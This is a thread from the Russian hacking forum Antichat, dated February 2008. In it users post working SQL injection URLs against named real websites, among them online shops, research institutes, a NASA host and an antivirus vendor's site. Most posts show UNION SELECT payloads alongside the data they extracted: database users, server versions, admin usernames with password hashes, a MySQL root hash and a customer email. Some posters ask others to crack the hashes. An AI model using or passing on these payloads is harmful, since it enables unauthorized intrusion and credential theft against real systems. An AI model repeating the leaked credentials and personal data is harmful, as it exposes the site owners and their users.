ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4901  
Старый 22.02.2008, 23:56
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Обратите внимание на счетчик сайта

http://www.theplace.ru/forum/message.php?id=-87910+union+select+1,2,3,concat(table_schema,0x3a, table_name,0x3a,column_name),5,6,7,8+from+informat ion_schema.columns+where+column_name+like+0x257061 737325+limit+0,1/*&top_id=87910
 
Ответить с цитированием

  #4902  
Старый 23.02.2008, 01:33
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Код:
http://korea-dpr.com/users/russia/news/message.php?id=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6/*
4.0.24_Debian-10-log/russia/russia@localhost

Код:
http://www.trueyoga.com/page.php?ID=0x313527%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6/*
4.0.27-max-log/tydbu/tydbu@208.109.78.140

упс

Последний раз редактировалось CaNNabi$; 23.02.2008 в 12:56..
 
Ответить с цитированием

  #4903  
Старый 23.02.2008, 02:06
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://www.classpad.org/details.php?id=-186+union+select+1,concat_ws(0x3a,customers_lastna me,customers_password,customers_id),3,4,5,6,7,8,9, 10,11,12,13,14,15,16+from+customers+limit+1,1/*&cat=5

Ппц ели додумалсо до это таблицы Ж(никогда бы ни подумал).Кому не лень,расшифруйте и скиньте в ЛС)))))))))))))))))))))))))))))))))))))))))))))) ))))))))))


Hallgren:6c7be71afc1a971cdc69e575fca701ec:02
 
Ответить с цитированием

  #4904  
Старый 23.02.2008, 03:23
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

2 Велемир limit+0,1 Denley:48b908cfdfea2575482eead693f6021f:7b:737
md5($salt.$password) если не ошибаюсь

Цитата:
http://www.sibezrcs.ru/uslugi.php?id=-1+union+select+1,name+from+articles+limit+1,1/*
ничего такого


ver 4.1.18
sibezrcs@fe27.hc.ru

Последний раз редактировалось gibson; 23.02.2008 в 13:10..
 
Ответить с цитированием

  #4905  
Старый 23.02.2008, 13:49
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

Шоп)
_http://www.visionsp.co.uk/shop.asp?navcatid=-11+UNION+ALL+ SELECT%20null
 
Ответить с цитированием

  #4906  
Старый 23.02.2008, 17:54
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

sunnyborder.com
Код HTML:
http://www.sunnyborder.com/pages/plant.php?id=290+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
L1v91n1@localhost:4.1.12-log:sunnyborder
----------------------------------------------------------
onestops.info
Код HTML:
http://www.onestops.info/category.php?cat_id=-10'+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2/*
onestops@localhost:4.1.19-standard:onestops
----------------------------------------------------------
southphillyreview.com
Код HTML:
http://southphillyreview.com/view_article.php?id=-6606+union+select+convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1)/*
philly_review@rp1:4.1.12-standard:philly_review_db
Код HTML:
http://southphillyreview.com/view_article.php?id=-6606+union+select+convert(concat(id,email)+using+latin1)+from+users/*
31mark@highermedia.com
----------------------------------------------------------
idahosystemofcare.org
Код HTML:
http://www.idahosystemofcare.org/cal/month.php?cid=-3+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7/*
idsoc@216.197.96.150:4.1.20-log:dbidsoc
 
Ответить с цитированием

  #4907  
Старый 23.02.2008, 19:28
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

sony--ericsson
_http://www.sony-ericsson.ru/catalog/phone.php?fam=24&idmodel=-101+union+select+1,version(),user(),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18/*&idkey=2&idparent=4
4.1.22
sonyeric_old@localhost
 
Ответить с цитированием

  #4908  
Старый 23.02.2008, 20:29
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.99brands.com/products.php?category_id=-21+union+select+1,2+from+orders/*
Нашел таблы products, categories дальше влом ковырять... Шоп по продаже часов, кажись online там есть партнерская программа типо главмеда...
 
Ответить с цитированием

  #4909  
Старый 23.02.2008, 21:06
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Прошёлся по институтам:
-----------------------------------
Институт Морской Геологии и Геофизики г. Южно-Сахалинск

_http://www.imgg.ru/rus/news.php?num=-1183099646'+union+select+1,user(),version(),databa se()/*

root@localhost
4.0.18-log
site

_http://www.imgg.ru/rus/news.php?num=-1183099646'+union+select+1,user,password,4+from+my sql.user/*

root:059391cc0d366090
-------------------------------------
"Институт проблем предпринимательства" Питер
_http://www.ippnou.ru/article.php?idarticle=-9999999+union+select+1,user(),version(),4,5/*

u12018@localhost
4.1.20

http://www.ippnou.ru/article.php?idarticle=-9999999+union+select+1,name,pass,4,5+from+admin/*

montana 6faa499662c77a0b

Кому не лень попробуйте через order подобрать столбцы от 1 до 6, не пойму почему такой вывод.Вот рабочий параметр:

_http://www.ippnou.ru/article.php?idarticle=000282
--------------------------------------
 
Ответить с цитированием

NASA и Dr.Web
  #4910  
Старый 23.02.2008, 21:54
ртуть
Постоянный
Регистрация: 31.08.2007
Сообщений: 571
Провел на форуме:
1847821

Репутация: 953


Talking NASA и Dr.Web

Для любителей экстремального отдыха


NASA:

https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=-1'
https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=3-1/**/or/**/1=@@version


Dr.Web:

http://old.antivir.ru/inf/virus.php?id=-31/**/union/**/select/**/1,2,3,4,5,6,7,8,9/*

к сведению

old.antivir.ru has address 81.176.66.227
Found 16 websites with the IP 81.176.66.227

1) adinf.com
2) adinf.ru
3) antigen.ru
4) antimonov.ru
5) antivir.ru
6) devicelock.ru
7) dialog-nauka.ru
8) dialognauka.com
9) dialognauka.ru
10) dials.ru
11) ftp.adinf.ru
12) ftp.antivir.ru
13) ftp.dialognauka.ru
14) ftp.dials.ru
15) new.antivir.ru
16) old.antivir.ru

interrus@localhost
virus
4.0.22-log


PS: "Данный файл был обнаружен где-то в недрах
гугла и по запросу, который уже никто не помнит )). Мы не можем быть признаны
ответственными за его распространение, так как он был найден через общедоступную
поисковую систему. Вы могли быть на нашем месте ))." // (c) defaced 3 //
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ